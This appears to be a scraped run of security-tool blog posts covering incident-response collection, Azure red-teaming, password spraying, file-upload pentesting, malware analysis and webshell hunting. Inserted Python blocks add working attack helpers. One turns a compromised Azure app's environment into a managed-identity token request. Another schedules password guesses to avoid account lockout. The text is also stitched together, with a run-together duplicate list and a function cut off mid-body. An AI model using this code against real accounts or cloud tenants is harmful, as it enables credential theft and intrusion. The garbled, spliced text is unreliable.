[email protected]:<dir>$ chmod +x ./Cat-Scale.sh
[email protected]:<dir>$ sudo ./Cat-Scale.sh

The script will create a directory called "FSecure-out" in the working directory and should remove all artefacts after being compressed. This will leave a filename in the format of FSecure_Hostname-YYMMDD-HHMM.tar.gz

Once these are all aggregated and you have the FSecure_Hostname-YYMMDD-HHMM.tar.gz on the analysis machine, you can run Extract-Cat-Scale.sh, which will extract all the files and place them in a folder called "extracted".

[email protected]:<dir>$ chmod +x ./Extract-Cat-Scale.sh
[email protected]:<dir>$ sudo ./Extract-Cat-Scale.sh

Parsing

This project has predefined grok filters to ingest data into elastic, feel free to modify them as you need.


What does it collect?

This script will produce the following files/folders, which can be reviewed as text files or using the ELK Stack.

Resolver configuration file resolv.conf executables-list.txt - All ELF files on disk with +x attribute group.txt - List of groups and the members belonging to each group home-dir-timeline - Timeline of all files in /home/* host.conf.txt - Resolver configuration file host.conf hosts.allow.txt - Host access control file hosts.allow hosts.deny.txt - Host access control file hosts.deny hosts.txt - Static table lookup for hostnames /etc/hosts ifconfig.txt - ifconfig -a Output iptables.txt - Tables of IPv4 and IPv6 packet filter rules in the Linux kernel. lastbad.txt - Records failed login attempts lastlog.txt - The most recent login of all users or of a given user last.txt - History of all logins and logouts lsmod.txt - Kernel modules are currently loaded lsof-processes.txt - List of all open files and the processes that opened them. lsusb.txt - Attached USB device info md5-ps.txt - ps command bin md5 meminfo.txt - Memory info netstat-ano.txt - Listing All Sockets, in numeric form with timer info netstat-antup.txt - All tcp/udp connection in numeric form with process ID netstat-list.txt - All tcp/udp connection in numeric form with process ID without headers num-proc.txt - number of processes according to ps command num-ps.txt - number of processes according to /proc directory package-list.txt - All files in all rpm packages packages-result.txt - all executables that are not part of rpm packages passwd.txt - Copy of the passwd file persistence-anacron.txt - All Anacron jobs persistence-cronlist.txt - All Cron jobs persistence-initd.txt - All initd scripts persistence-profiled.txt - Scripts that run when User logs in persistence-rc-scripts.txt - All rc scripts. 
(run level scipts) persistence-shellrc-etc.txt - All startup script contents in /etc/ persistence-shellrc-home.txt - All startup script contents in /home/ persistence-shellrc-root.txt - All startup script contents in /root/ persistence-systemdlist.txt - All systemd services and execution commandlines process-details.txt - All running process details and status information processes-list.txt - All running process acording to ps processes.txt - All running process acording to /proc/ directory processhashes.txt - Hash of all running processes procmod.txt - Loaded modules for all processes release.txt - OS information routetable.txt - Contents of kernel routing table. route command output sbin-dir-timeline - Timeline of all files in /sbin/* service_status.txt - All running service and their status. ssh_config.txt - ssh service config file sshd_config.txt - ssh service config file sudoers.txt - List of sudoers tmp-dir-timeline - Timeline of all files in /tmp/* tmp-executable-files-for-diff.txt - tmp-executable-files.txt without executable type metadata for later diff operation with packages tmp-executable-files.txt - All files with +x attributes (executables) tmp-types.txt - tmp file for Find types of executable(script\|ELF\|executable) var-www-dir-timeline - Timeline of all files in /var/www/* whoandwhat.txt - w command output. Who is logged on and what they are doing. who.txt - List of users who are currently logged in wtmp-lastlog.txt - wtmp last log varlogs - All contents of /var/log viminfo - All viminfo files... Can contain vi historic commands ">
bash_history                    - Bash history for all users
bash_profile - Bash profile file for all users
bash_rc - Bash_rc file
full-timeline.csv - Timeline of all files in the following directories: /home/* + var/www/* + /tmp/ + /dev/shm/ + /bin + /sbin
bin-dir-timeline - Timeline of all files in /bin
binhashes.txt - Hash of all executable files under $PATH variable
btmp-lastlog.txt - btmp last log
console-error-log.txt - All errors produced by the script are redirected here
cpuinfo.txt - CPU info
dev-shm-dir-timeline - Timeline of all files in /dev/shm/
df.txt - Information about the file system on which each FILE resides, or all file systems by default.
dhcp.txt - Resolver configuration file resolv.conf
executables-list.txt - All ELF files on disk with +x attribute
group.txt - List of groups and the members belonging to each group
home-dir-timeline - Timeline of all files in /home/*
host.conf.txt - Resolver configuration file host.conf
hosts.allow.txt - Host access control file hosts.allow
hosts.deny.txt - Host access control file hosts.deny
hosts.txt - Static table lookup for hostnames /etc/hosts
ifconfig.txt - ifconfig -a Output
iptables.txt - Tables of IPv4 and IPv6 packet filter rules in the Linux kernel.
lastbad.txt - Records failed login attempts
lastlog.txt - The most recent login of all users or of a given user
last.txt - History of all logins and logouts
lsmod.txt - Kernel modules are currently loaded
lsof-processes.txt - List of all open files and the processes that opened them.
lsusb.txt - Attached USB device info
md5-ps.txt - ps command bin md5
meminfo.txt - Memory info
netstat-ano.txt - Listing All Sockets, in numeric form with timer info
netstat-antup.txt - All tcp/udp connection in numeric form with process ID
netstat-list.txt - All tcp/udp connection in numeric form with process ID without headers
num-proc.txt - number of processes according to ps command
num-ps.txt - number of processes according to /proc directory
package-list.txt - All files in all rpm packages
packages-result.txt - all executables that are not part of rpm packages
passwd.txt - Copy of the passwd file
persistence-anacron.txt - All Anacron jobs
persistence-cronlist.txt - All Cron jobs
persistence-initd.txt - All initd scripts
persistence-profiled.txt - Scripts that run when User logs in
persistence-rc-scripts.txt - All rc scripts (run level scripts)
persistence-shellrc-etc.txt - All startup script contents in /etc/
persistence-shellrc-home.txt - All startup script contents in /home/
persistence-shellrc-root.txt - All startup script contents in /root/
persistence-systemdlist.txt - All systemd services and execution commandlines
process-details.txt - All running process details and status information
processes-list.txt - All running processes according to ps
processes.txt - All running processes according to the /proc/ directory
processhashes.txt - Hash of all running processes
procmod.txt - Loaded modules for all processes
release.txt - OS information
routetable.txt - Contents of kernel routing table. route command output
sbin-dir-timeline - Timeline of all files in /sbin/*
service_status.txt - All running service and their status.
ssh_config.txt - ssh client config file
sshd_config.txt - ssh service config file
sudoers.txt - List of sudoers
tmp-dir-timeline - Timeline of all files in /tmp/*
tmp-executable-files-for-diff.txt - tmp-executable-files.txt without executable type metadata for later diff operation with packages
tmp-executable-files.txt - All files with +x attributes (executables)
tmp-types.txt - tmp file for Find types of executable(script\|ELF\|executable)
var-www-dir-timeline - Timeline of all files in /var/www/*
whoandwhat.txt - w command output. Who is logged on and what they are doing.
who.txt - List of users who are currently logged in
wtmp-lastlog.txt - wtmp last log
varlogs - All contents of /var/log
viminfo - All viminfo files... Can contain vi historic commands
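Two checks a responder would run over the artefacts listed above, added here as an example (this is not part of the collection script): the executables-versus-package-manifest diff that yields packages-result.txt, and a PID-level version of the num-proc / num-ps comparison that names the hidden process instead of just counting. The input formats are assumed and the sample contents are constructed, as noted in the docstring.

```python
"""Post-process two artefact pairs from the collection described above.

Added example, not part of the collection script. Input formats are assumed:
  - tmp-executable-files-for-diff.txt : one absolute path per line (find output)
  - package-list.txt                  : one absolute path per line (rpm -qal output)
  - processes-list.txt                : ps -eo pid,comm style output, header + rows
  - processes.txt                     : one numeric PID (a /proc entry) per line
The sample contents below are constructed for the example.
"""
import re

# --- constructed sample artefacts --------------------------------------
FIND_OUTPUT = """\
/usr/bin/ls
/usr/bin/ps
/usr/sbin/sshd
/tmp/.x/kworkerds
/dev/shm/.cache/mini
"""

RPM_OUTPUT = """\
/usr/bin/ls
/usr/bin/ps
/usr/sbin/sshd
/usr/share/doc/coreutils/README
"""

PS_OUTPUT = """\
  PID COMMAND
    1 systemd
  412 sshd
  877 bash
"""

PROC_LISTING = """\
1
412
877
1337
"""


def unowned_executables(find_text, rpm_text):
    """Return +x files on disk that no installed package claims.

    Mirrors the packages-result.txt artefact: the package manifest is the
    allow-list, and any executable outside it deserves a look (ELF files in
    /tmp or /dev/shm especially).
    """
    owned = {line.strip() for line in rpm_text.splitlines() if line.strip()}
    on_disk = [line.strip() for line in find_text.splitlines() if line.strip()]
    return sorted(p for p in on_disk if p not in owned)


def pids_from_ps(ps_text):
    """Parse the PID column of ps output, skipping the header line."""
    pids = set()
    for line in ps_text.splitlines()[1:]:
        m = re.match(r"\s*(\d+)\s", line)
        if m:
            pids.add(int(m.group(1)))
    return pids


def pids_from_proc(proc_text):
    """Numeric /proc entries are PIDs; anything else (cpuinfo, self, ...) is ignored."""
    return {int(t) for t in proc_text.split() if t.isdigit()}


def hidden_pids(ps_text, proc_text):
    """PIDs present in /proc but absent from ps: a classic userland-rootkit sign.

    num-proc.txt and num-ps.txt only record the two counts; comparing the
    actual PID sets tells you *which* process is hidden. A process that exited
    between the two snapshots also shows up here, so confirm against
    /proc/<pid>/status before escalating.
    """
    return pids_from_proc(proc_text) - pids_from_ps(ps_text)


if __name__ == "__main__":
    print("unowned executables:", unowned_executables(FIND_OUTPUT, RPM_OUTPUT))
    print("hidden pids:", hidden_pids(PS_OUTPUT, PROC_LISTING))
```

Both functions work on the text files the script leaves behind, so they can be run on the analyst's machine after collection rather than on the endpoint.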

Disclaimer

Note that the script will likely alter artefacts on endpoints. Care should be taken when using the script. This is not meant to take forensically sound disk images of the remote endpoints.


Tested OSes
  • Ubuntu 16.04
  • CentOS
  • Mint
  • Solaris 11.4


Azur3Alph4 - A PowerShell Module That Automates Red-Team Tasks For Ops On Objective

11 October 2021 at 20:30
By: Zion3R


Azur3Alph4 is a PowerShell module that automates red-team tasks for ops on objective. It is meant to be run from a post-breach position (RCE already achieved); token extraction and many other functions will not succeed without that starting point. Use it for further enumeration and movement from a compromised app that runs under a managed identity.
Azur3Alph4 is currently in development. Functions are being added and updated, and most of them are still untested.

Scripts are in repo for individual use and easy identification, but the .psm1 file is what will be consistently updated.


Installation & Usage

Import-Module Azur3Alph4

Point $envendpoint at the command-execution endpoint that runs "env" on the compromised Azure app, so the module can read the app's environment variables.


Updates - 8/10/2021
  • Added Get-ResourceActions.ps1 and updated Azur3Alph4.psm1

Updates - 8/5/2021
  • Made Azur3Alph4 modular
  • Added Get-SubscriptionId function

Why This Was Built
  • I built this because I wanted to learn more about both PowerShell and Azure, two things I'd definitely like to get better at.
  • To help automate and eliminate a lot of repetitive PS commands.
  • To build off my current knowledge of Azure red teaming

Function List

Get-Endpoint

Enumerates an Azure endpoint to verify whether or not it belongs to a managed identity


Get-ManagedIdentityToken

Grabs the Managed Identity Token from the endpoint using the extracted secret. Stores the value in a given variable


Connect-AzAccount

Takes a username and password variable and automates SecureString conversion and connects to an Azure account


Get-SubscriptionId

Gets the subscription ID using the REST API for Azure


Get-ManagedIdentityResources

Uses the subscription ID to enumerate all resources that are accessible


Get-ResourceActions.ps1

Enumerates all resources available using Azure token and lists permissions of each resource directly below it
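What the $envendpoint step and Get-ManagedIdentityToken are after, shown as an added Python example (not Azur3Alph4's own code, which is PowerShell): the environment of an Azure App Service or Function with a managed identity carries the local token endpoint and the per-app secret header, and a GET with those two values returns an access token for the identity. The endpoint and header names and the api-versions are the documented Azure ones; the `env` dump below is constructed, and `is_managed_identity_host` is an env-based stand-in for what Get-Endpoint verifies, not its actual logic.

```python
"""Build the managed-identity token request from a dump of `env`.

Added example, not Azur3Alph4's own code. The endpoint/header names and
api-versions are the documented Azure ones; the env dump is constructed.
"""
from urllib.parse import urlencode

ARM_RESOURCE = "https://management.azure.com/"

# Constructed `env` output from an App Service / Function with a managed identity.
SAMPLE_ENV = """\
PATH=/usr/local/bin:/usr/bin
IDENTITY_ENDPOINT=http://127.0.0.1:41459/msi/token
IDENTITY_HEADER=6a1b2c3d-constructed-secret
WEBSITE_SITE_NAME=victim-app
"""


def parse_env(env_text):
    """Turn `KEY=VALUE` lines into a dict; values may themselves contain '='."""
    out = {}
    for line in env_text.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            out[key.strip()] = value.strip()
    return out


def is_managed_identity_host(env):
    """Does this app's environment expose a managed-identity token endpoint?"""
    return any(k in env for k in ("IDENTITY_ENDPOINT", "MSI_ENDPOINT"))


def build_token_request(env, resource=ARM_RESOURCE):
    """Return (url, headers) for the token endpoint this host exposes.

    Three generations of the same mechanism exist. The header value is the
    "extracted secret" the tool refers to: it proves the caller is running
    inside the app. Nothing is sent here; the caller issues the GET.
    """
    if "IDENTITY_ENDPOINT" in env:            # App Service / Functions, current names
        url = env["IDENTITY_ENDPOINT"] + "?" + urlencode(
            {"resource": resource, "api-version": "2019-08-01"})
        return url, {"X-IDENTITY-HEADER": env["IDENTITY_HEADER"]}
    if "MSI_ENDPOINT" in env:                 # App Service, legacy names
        url = env["MSI_ENDPOINT"] + "?" + urlencode(
            {"resource": resource, "api-version": "2017-09-01"})
        return url, {"secret": env["MSI_SECRET"]}
    # Azure VM / VMSS: the IMDS endpoint, no secret, only the Metadata header.
    url = "http://169.254.169.254/metadata/identity/oauth2/token?" + urlencode(
        {"api-version": "2018-02-01", "resource": resource})
    return url, {"Metadata": "true"}


if __name__ == "__main__":
    env = parse_env(SAMPLE_ENV)
    print("managed identity endpoint present:", is_managed_identity_host(env))
    url, headers = build_token_request(env)
    print(url)
    print(headers)
```

The returned token is scoped to the `resource` you ask for; request `https://management.azure.com/` to enumerate subscriptions and resources as the later functions do, or another audience (Key Vault, Storage, Graph) when the identity has roles there.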


Credits
  • Big shout out to @nikhil_mitt for the CARTP course that got me started in Azure


BruteLoops - Protocol Agnostic Online Password Guessing API

11 October 2021 at 11:30
By: Zion3R


A dead simple library providing the foundational logic for efficient password brute force attacks against authentication interfaces.

See various Wiki sections for more information.

A "modular" example is included with the library that demonstrates how to use this package. It's fully functional and provides multiple brute force modules. Below is a sample of its capabilities:


http.accellion_ftp   Accellion FTP HTTP interface login module
http.basic_digest    Generic HTTP basic digest auth
http.basic_ntlm      Generic HTTP basic NTLM authentication
http.global_protect  Global Protect web interface
http.mattermost      Mattermost login web interface
http.netwrix         Netwrix web login
http.okta            Okta JSON API
http.owa2010         OWA 2010 web interface
http.owa2016         OWA 2016 web interface
smb.smb              Target a single SMB server
testing.fake         Fake authentication module for training/testing

Key Features
  • Protocol agnostic - If a callback can be written in Python, BruteLoops can be used to attack it
  • SQLite support - All usernames, passwords, and credentials are maintained in an SQLite database.
    • A companion utility (dbmanager.py) that creates and manages input databases accompanies BruteLoops
  • Spray and Stuffing Attacks in One Tool - BruteLoops supports both spray and stuffing attacks in the same attack logic and database, meaning that you can configure a single database and run the attack without heavy reconfiguration and confusion.
  • Guess scheduling - Each username in the SQLite database is configured with a timestamp that is updated after each authentication event. This means we can significantly reduce likelihood of locking accounts by scheduling each authentication event with precision.
  • Fine-grained configurability to avoid lockout events - Microsoft's lockout policies can be matched 1-to-1 using BruteLoops' parameters:
    • auth_threshold = Lockout Threshold
    • max_auth_jitter = Lockout Observation Window
    • Timestamps associated with each authentication event are tracked in BruteLoops' SQLite database. Each username receives a distinct timestamp to ensure that authentication events are tightly controlled.
  • Attack resumption - Stopping and resuming an attack is possible without losing your place in the attack or locking accounts.
  • Multiprocessing - Speed up attacks using multiprocessing! By configuring the parallel guess count, you're effectively telling BruteLoops how many usernames to guess in parallel.
  • Logging - Each authentication event can optionally be logged to disk. This information is useful during red teams because it gives the customer a detailed attack timeline that can be mapped back to their own logged events.
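The scheduling idea behind the two lockout parameters, as an added example (this is not BruteLoops' own scheduler, and the mapping is a conservative reading of the policy, not necessarily the tool's exact rule): Windows increments a per-account bad-password counter on each failure and only resets it once the observation window has passed with no further failures, so a safe scheduler allows at most threshold minus a margin failures per user and then waits a full window measured from the last failure. Usernames and times below are constructed.

```python
"""A per-username guess scheduler that stays under a Windows lockout policy.

Added example, not BruteLoops' own scheduler. Parameters mirror the AD policy:
a lockout threshold (failures before lockout) and an observation window
(Windows resets the bad-password counter only after the window elapses with no
new failures). Applied conservatively: at most threshold-1 failures per user,
then a full window of silence counted from the *last* failure in the burst.
"""
from collections import deque


class GuessScheduler:
    def __init__(self, lockout_threshold, observation_window, safety_margin=1):
        if lockout_threshold <= safety_margin:
            raise ValueError("threshold must exceed the safety margin")
        self.burst = lockout_threshold - safety_margin   # failures allowed per window
        self.window = observation_window                 # seconds
        self._history = {}                               # user -> deque of failure times

    def next_allowed(self, user, now):
        """Earliest time a guess against `user` is safe; equals `now` if safe now."""
        hist = self._history.setdefault(user, deque())
        # Forget failures Windows would have reset: the counter clears once a
        # full window has elapsed since the most recent failure.
        if hist and now - hist[-1] >= self.window:
            hist.clear()
        if len(hist) < self.burst:
            return now
        return hist[-1] + self.window

    def record_guess(self, user, when, success=False):
        """Log an authentication event (a wrong password unless success=True).

        A correct password does not increment the bad-password counter, so a
        success is not recorded; the caller should stop guessing that user anyway.
        """
        if success:
            self._history.pop(user, None)
            return
        self._history.setdefault(user, deque()).append(when)

    def schedule(self, users, now):
        """(next_time, user) pairs sorted by when each user may be hit next.

        This is the spray order: users who are safe now come first, users in
        their cool-down come last, so the attack never idles while any user
        is available.
        """
        return sorted((self.next_allowed(u, now), u) for u in users)


if __name__ == "__main__":
    # Constructed policy: lock after 5 failures, 30-minute observation window.
    sched = GuessScheduler(lockout_threshold=5, observation_window=30 * 60)
    for t in (0, 10, 20, 30):
        sched.record_guess("alice", t)
    print(sched.schedule(["alice", "bob"], now=31))
```

With a threshold of 5 and a 30-minute window the scheduler permits four guesses against a user in quick succession and then refuses that user until 30 minutes after the fourth failure; pausing and resuming is safe because the decision depends only on the stored timestamps, which is what the SQLite-backed design described above buys you.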

Dependencies

BruteLoops requires Python 3.7 or newer and SQLAlchemy 1.3.0; the latter can be installed with pip from the requirements.txt file in this repository: python3.7 -m pip install -r requirements.txt


Installation
git clone https://github.com/arch4ngel/bruteloops
cd bruteloops
python3 -m pip install -r requirements.txt

How do I use this Damn Thing?

Jeez, alright already...we can break an attack down into a few steps:

  1. Find an attackable service
  2. If one isn't already available in the example.py directory, build a callback
  3. Find some usernames, passwords, and credentials
  4. Construct a database by passing the authentication data to dbmanager.py
  5. If relevant, enumerate or request the AD lockout policy to intelligently configure the attack
  6. Execute the attack in alignment with the target lockout policy


FUSE - A Penetration Testing Tool For Finding File Upload Bugs

10 October 2021 at 20:30
By: Zion3R


FUSE is a penetration testing system designed to identify Unrestricted Executable File Upload (UEFU) vulnerabilities. The details of the testing strategy are in our paper, "FUSE: Finding File Upload Bugs via Penetration Testing", which appeared at NDSS 2020. To see how to configure and execute FUSE, read the following sections.


Setup

Install

FUSE currently works on Ubuntu 18.04 and Python 2.7.15.

  1. Install dependencies
# apt-get install rabbitmq-server
# apt-get install python-pip
# apt-get install git
  2. Clone and build FUSE
$ git clone https://github.com/WSP-LAB/FUSE
$ cd FUSE && pip install -r requirements.txt
  • If you plan to use headless browser verification with Selenium, install the Chrome and Firefox web drivers as described in the Selenium documentation.

Usage

Configuration
  • FUSE uses a user-provided configuration file that specifies parameters for a target PHP application. The file must be filled out before testing a target web application. See the README file and the example configuration files.

  • Configuration for File Monitor (Optional)

$ vim filemonitor.py

...
MONITOR_PATH='/var/www/html/'      <- Web root of the target application
MONITOR_PORT=20174                 <- Default port of File Monitor
EVENT_LIST_LIMITATION=8000         <- Maximum number of elements in EVENT_LIST
...
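The role the File Monitor plays, as an added example (this is not FUSE's filemonitor.py): it watches the configured web root and records files that appear or change, which is how an upload attempt is confirmed to have landed on disk with an extension the server would execute. The three settings above are mirrored (a monitored path, a bounded event list, a query for results); the listening port is left out, and the directory used by `demo()` is a temporary one created for the example.

```python
"""A minimal web-root file monitor of the kind FUSE's filemonitor.py provides.

Added example, not FUSE's own code. It snapshots the web root and reports files
created or modified since the previous poll, keeping a bounded event list like
EVENT_LIST_LIMITATION. The directory used by demo() is a temporary one.
"""
import os
import tempfile
import time
from collections import deque

EVENT_LIST_LIMITATION = 8000


class FileMonitor:
    def __init__(self, monitor_path, limit=EVENT_LIST_LIMITATION):
        self.root = monitor_path
        self.events = deque(maxlen=limit)      # oldest events drop off when full
        self._seen = self._snapshot()

    def _snapshot(self):
        """Map every file under the root to its (size, mtime)."""
        state = {}
        for dirpath, _, files in os.walk(self.root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.stat(path)
                except FileNotFoundError:       # raced with a delete
                    continue
                state[path] = (st.st_size, st.st_mtime)
        return state

    def poll(self):
        """Record and return the paths that are new or modified since the last poll."""
        current = self._snapshot()
        changed = sorted(p for p, meta in current.items() if self._seen.get(p) != meta)
        for p in changed:
            self.events.append((time.time(), p))
        self._seen = current
        return changed

    def uploaded_with_extension(self, *exts):
        """Uploads that kept a server-executable extension are the UEFU findings."""
        return sorted({p for _, p in self.events if p.lower().endswith(exts)})


def demo():
    """Run against a temporary web root (constructed for the example) and return the results."""
    root = tempfile.mkdtemp()
    mon = FileMonitor(root)
    first = mon.poll()                           # nothing has changed yet
    shell = os.path.join(root, "avatar.php")
    with open(shell, "w") as f:
        f.write("<?php echo 'fuse-probe'; ?>")  # a harmless probe, as an upload test would write
    second = mon.poll()
    third = mon.poll()
    return {"first": first, "second": second, "third": third,
            "hits": mon.uploaded_with_extension(".php", ".phtml", ".phar")}


if __name__ == "__main__":
    print(demo())
```

In a real test the monitor runs on the target host beside the web server and the tester correlates each upload attempt with the events recorded here; a file that shows up under the web root with `.php`, `.phtml` or a similar extension is the UEFU candidate that the report then verifies by requesting it.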

Execution
  • FUSE
$ python framework.py [Path of configuration file]
  • File Monitor
$ python filemonitor.py
  • Result
    • When FUSE completes the penetration test, a [HOST] directory and a [HOST_report.txt] file are created.
    • The [HOST] folder stores the files that FUSE attempted to upload.
    • The [HOST_report.txt] file contains the test results and information about the files that triggered U(E)FU.

CVEs

If you find UFU and UEFU bugs and get CVEs by running FUSE, please send a PR for README.md

Application     CVEs
Elgg            CVE-2018-19172
ECCube3         CVE-2018-18637
CMSMadeSimple   CVE-2018-19419, CVE-2018-18574
CMSimple        CVE-2018-19062
Concrete5       CVE-2018-19146
GetSimpleCMS    CVE-2018-19420, CVE-2018-19421
Subrion         CVE-2018-19422
OsCommerce2     CVE-2018-18572, CVE-2018-18964, CVE-2018-18965, CVE-2018-18966
Monstra         CVE-2018-6383, CVE-2018-18694
XE              XEVE-2019-001

Author

This research project has been conducted by WSP Lab at KAIST.


Citing FUSE

To cite our paper:

@INPROCEEDINGS{lee:ndss:2020,
author = {Taekjin Lee and Seongil Wi and Suyoung Lee and Sooel Son},
title = {{FUSE}: Finding File Upload Bugs via Penetration Testing},
booktitle = {Proceedings of the Network and Distributed System Security Symposium},
year = 2020
}


Qu1cksc0pe - All-in-One Static Malware Analysis Tool

10 October 2021 at 11:30
By: Zion3R


This tool allows you to statically analyze Windows, Linux and macOS executables and APK files.

You can get:

  • What DLL files are used.
  • Functions and APIs.
  • Sections and segments.
  • URLs, IP addresses and emails.
  • Android permissions.
  • File extensions and their names.
    And so on...

Qu1cksc0pe aims to extract as much information as possible about suspicious files and helps the user understand what a file is capable of.


Usage
python3 qu1cksc0pe.py --file suspicious_file --analyze

Setup

Necessary python modules:

  • puremagic => Analyzing target OS and magic numbers.
  • androguard => Analyzing APK files.
  • apkid => Check for Obfuscators, Anti-Disassembly, Anti-VM and Anti-Debug.
  • prettytable => Pretty outputs.
  • tqdm => Progressbar animation.
  • colorama => Colored outputs.
  • oletools => Analyzing VBA Macros.
  • pefile => Gathering all information from PE files.
  • quark-engine => Extracting IP addresses and URLs from APK files.
  • pyaxmlparser => Gathering information from target APK files.
  • yara-python => Android library scanning with Yara rules.
  • prompt_toolkit => Interactive shell.


Installation of python modules: pip3 install -r requirements.txt
Gathering other dependencies:

  • VirusTotal API Key: https://virustotal.com
  • Binutils: sudo apt-get install binutils
  • ExifTool: sudo apt-get install exiftool
  • Strings: sudo apt-get install strings

Alert

You must specify jadx binary path in Systems/Android/libScanner.conf

[Rule_PATH]
rulepath = /Systems/Android/YaraRules/

[Decompiler]
decompiler = JADX_BINARY_PATH <-- You must specify this.

Installation
  • You can install Qu1cksc0pe easily on your system. Just execute the following command.
    Command 0: sudo pip3 install -r requirements.txt
    Command 1: sudo python3 qu1cksc0pe.py --install

Scan arguments

Normal analysis

Usage: python3 qu1cksc0pe.py --file suspicious_file --analyze


Multiple analysis

Usage: python3 qu1cksc0pe.py --multiple FILE1 FILE2 ...


Hash scan

Usage: python3 qu1cksc0pe.py --file suspicious_file --hashscan


Folder scan

Supported Arguments:

  • --hashscan
  • --packer

Usage: python3 qu1cksc0pe.py --folder FOLDER --hashscan




VirusTotal

Report Contents:

  • Threat Categories
  • Detections
  • CrowdSourced IDS Reports

Usage for --vtFile: python3 qu1cksc0pe.py --file suspicious_file --vtFile




Document scan

Usage: python3 qu1cksc0pe.py --file suspicious_document --docs



Programming language detection

Usage: python3 qu1cksc0pe.py --file suspicious_executable --lang




Interactive shell

Usage: python3 qu1cksc0pe.py --console



Domain

Usage: python3 qu1cksc0pe.py --file suspicious_file --domain


Information about categories

Registry

This category contains functions and strings about:

  • Creating or destroying registry keys.
  • Changing registry keys and logs.

File

This category contains functions and strings about:

  • Creating/modifying/infecting/deleting files.
  • Getting information about file contents and filesystems.

Networking/Web

This category contains functions and strings about:

  • Communicating with malicious hosts.
  • Downloading malicious files.
  • Sending information about the infected machine and its user.

Process

This category contains functions and strings about:

  • Creating/infecting/terminating processes.
  • Manipulating processes.

Dll/Resource Handling

This category contains functions and strings about:

  • Handling DLL files and other malware resource files.
  • Infecting and manipulating DLL files.

Evasion/Bypassing

This category contains functions and strings about:

  • Manipulating Windows security policies and bypassing restrictions.
  • Detecting debuggers and doing evasive tricks.

System/Persistence

This category contains functions and strings about:

  • Executing system commands.
  • Manipulating system files and system options to get persistence in target systems.

COMObject

This category contains functions and strings about:

  • Microsoft's Component Object Model system.

Cryptography

This category contains functions and strings about:

  • Encrypting and decrypting files.
  • Creating and destroying hashes.

Information Gathering

This category contains functions and strings about:

  • Gathering information from target hosts, such as process states, network devices, etc.

Keyboard/Keylogging

This category contains functions and strings about:

  • Tracking the infected machine's keyboard.
  • Gathering information about the target's keyboard.
  • Managing input methods, etc.

Memory Management

This category contains functions and strings about:

  • Manipulating and using the target machine's memory.


GitOops - All Paths Lead To Clouds

9 October 2021 at 20:30
By: Zion3R


GitOops is a tool to help attackers and defenders identify lateral movement and privilege escalation paths in GitHub organizations by abusing CI/CD pipelines and GitHub access controls.


It works by mapping relationships between a GitHub organization and its CI/CD jobs and environment variables. It'll use any Bolt-compatible graph database as backend, so you can query your attack paths with openCypher:

MATCH p=(:User{login:"alice"})-[*..5]->(v:EnvironmentVariable)
WHERE v.name =~ ".*SECRET.*"
RETURN p


GitOops takes inspiration from tools like Bloodhound and Cartography.

Check out the docs and more example queries.



AF-ShellHunter - Auto Shell Lookup

9 October 2021 at 11:30
By: Zion3R


AF-ShellHunter: Auto shell lookup

AF-ShellHunter is a script designed to automate the search for webshells, developed by AF Team.


How to

pip3 install -r requirements.txt
python3 shellhunter.py --help


Basic Usage

You can run shellhunter in two modes

  • --url -u When scanning a single url
  • --file -f Scanning multiple URLs at once

Example: searching for a webshell through the Burp Suite proxy, hiding responses that contain the string "404" and keeping only those with a size between 100 and 1000 chars

┌──(blueudp㉿xxxxxxxx)-[~/AF-ShellHunter]
└─$ python3 shellhunter.py -u https://xxxxxxxxxx -hs "404" -p burp --greater-than 100 --smaller-than 1000
Running AF-Team ShellHunt 1.1.0

URL: https://xxxxxxxxxx
Showing only: 200, 302
Threads: 20
Not showing coincidence with: 404
Proxy: burp
Greater than: 100
Smaller than: 1000
Found https://xxxxxxxxxx/system.php len: 881


File configuration for multiple sites

phishing_list

# How to?
# set country block with [country], please read user_files/config.txt

# 'show-response-code "option1" "option2"' -> show responses with those status codes, as -sc
# 'show-string' -> show match with that string, as -ss
# 'show-regex' -> show match with regex, as -sr

# use 'not' for not showing X in above options, as -h[option]

# 'greater-than' -> Show response greater than X, as -gt ( --greater-than )
# 'smaller-than' -> Show responses smaller than X, as -st ( --smaller-than )


# Example searching webshell with BurpSuite proxy. 302, 200 status code, not showing results w/ 'página en mantenimiento' with size between 100 and 1000 chars

[burp]
https://banco.phishing->show-response-code "302" "200", not show-string "página en mantenimiento", greater-than 100, smaller-than 1000

[noproxy]
banco.es-> # ShellHunt will add 'http://
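A parser and matcher for the per-URL rule syntax documented in the comments above, added as an example (this is not AF-ShellHunter's own parser): `URL->rule, rule, ...`, where a rule is `show-response-code "a" "b"`, `show-string "s"`, `show-regex "r"`, `greater-than N` or `smaller-than N`, and a leading `not` inverts the three show-* rules. The responses are constructed (status, body) pairs, not real fetches; the proxy blocks are ignored here.

```python
"""Parse the per-URL rule syntax of the phishing_list file and apply it.

Added example, not AF-ShellHunter's own parser. Rules are ANDed: a response is
shown only if every rule on the line passes. Responses below are constructed.
"""
import re
import shlex


def parse_rule_line(line):
    """Split `URL->rules` into (url, [(name, negated, args), ...])."""
    url, _, rule_text = line.partition("->")
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "http://" + url                  # the file says ShellHunt adds http://
    rules = []
    for chunk in rule_text.split(","):         # rule arguments may not contain commas
        tokens = shlex.split(chunk.strip())    # honours the quoted "..." arguments
        if not tokens:
            continue
        negated = tokens[0] == "not"
        if negated:
            tokens = tokens[1:]
        name, args = tokens[0], tokens[1:]
        if name in ("greater-than", "smaller-than"):
            args = [int(args[0])]
        rules.append((name, negated, args))
    return url, rules


def response_matches(status, body, rules):
    """True if a (status, body) pair passes every rule on the line."""
    for name, negated, args in rules:
        if name == "show-response-code":
            hit = str(status) in args
        elif name == "show-string":
            hit = args[0] in body
        elif name == "show-regex":
            hit = re.search(args[0], body) is not None
        elif name == "greater-than":
            hit = len(body) > args[0]
        elif name == "smaller-than":
            hit = len(body) < args[0]
        else:
            raise ValueError("unknown rule: " + name)
        if hit == negated:                     # a negated rule must NOT hit
            return False
    return True


RULE_LINE = ('https://banco.phishing->show-response-code "302" "200", '
             'not show-string "página en mantenimiento", greater-than 100, smaller-than 1000')

# Constructed responses for candidate shell paths on the target.
RESPONSES = {
    "/system.php": (200, "<html>" + "x" * 870 + "</html>"),   # real shell, 883 bytes
    "/c99.php":    (200, "página en mantenimiento " + "." * 500),  # maintenance page
    "/shell.php":  (404, "Not Found " + "." * 200),           # wrong status
    "/index.php":  (200, "<html>" + "x" * 5000),              # too large
}


def find_candidates(rule_line, responses):
    """Return the full URLs whose constructed response passes the line's rules."""
    url, rules = parse_rule_line(rule_line)
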